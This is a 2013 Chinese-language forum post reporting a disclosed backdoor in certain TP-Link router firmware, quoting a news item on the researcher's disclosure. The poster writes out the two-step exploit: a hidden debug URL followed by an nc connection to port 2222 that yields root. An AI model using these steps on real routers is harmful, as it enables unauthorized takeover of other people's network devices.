Fw: [情報] TP-Link 路由器發現後門

看板Network作者Obb (有趣的世界)時間12年前 (2013/03/16 14:39)推噓3(3推 0噓 3→)

留言6則, 4人參與討論串1/1

※ [本文轉錄自 Broad_Band 看板 #1HH1E3Fu ] 作者: Obb (有趣的世界) 看板: Broad_Band 標題: Re: [情報] TP-Link 路由器發現後門時間: Sat Mar 16 14:38:57 2013 難怪美國的資訊採購堅持不用華為設備但我們三大電信採購買了很多... 真有種後門進入方式先http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html 再nc 192.168.0.1 2222 獲取TP-Link最高權限。 ※ 引述《YuiFAN (半熟魷魚)》之銘言： : http://www.solidot.org/story?sid=33846 : 安全研究員 Michal Sajdak 在深圳普聯技術有限公司（TP-LINK）的路由器產品 : TL-WDR4300 的韌體中發現了後門漏洞，在通知普聯無果後，公開了漏洞的概念 : 驗證攻擊代碼。 : 受影響的型號包括 TL-WDR4300 和 TL-WR743ND (v1.2 / v2.0) 等，包含遠程 : root 漏洞的韌體版本是去年底發佈的最新版本 3.13.23 Build 122512 : (即2012年12月25日發佈的版本)。Sajdak於 2月12日和22日兩次向普聯發去了 : 詳細介紹漏洞的郵件，都沒有得到任何回應，於是在3月12日公開了漏洞。 : 此漏洞的詳細說明網頁： : http://sekurak.pl/tp-link-httptftp-backdoor/ -- ※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 182.18.223.9 ※ 發信站: 批踢踢實業坊(ptt.cc) ※ 轉錄者: Obb (182.18.223.9), 時間: 03/16/2013 14:39:19